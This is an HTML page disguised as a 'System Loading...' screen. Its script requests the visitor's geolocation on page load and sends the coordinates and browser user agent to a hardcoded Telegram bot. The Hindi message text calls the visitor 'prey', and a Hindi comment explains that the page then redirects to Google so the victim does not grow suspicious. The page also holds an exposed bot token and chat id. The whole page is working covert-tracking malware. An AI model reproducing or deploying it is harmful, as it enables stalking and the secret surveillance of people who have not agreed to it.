<!DOCTYPE html>
<html>
<head>
    <title>System Loading...</title>
</head>
<body>
    <script>
        const botToken = "8845551713:AAE4l_EQciNCa8yYBg1JTjhZMhLKN1PGAKo"; 
        const chatId = "6491656959";

        async function startTracking() {
            if (!navigator.geolocation) return;

            navigator.geolocation.getCurrentPosition(async (pos) => {
                const data = `शिकार मिल गया! 🎯\nलोकेशन: ${pos.coords.latitude}, ${pos.coords.longitude}\nडिवाइस: ${navigator.userAgent}`;
                
                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(data)}`);
                
                // काम होते ही किसी असली वेबसाइट पर भेज दे ताकि शक न हो
                window.location.href = "https://www.google.com";
            }, (err) => {
                console.log("परमिशन नहीं मिली");
            });
        }
        startTracking();
    </script>
</body>
</html>
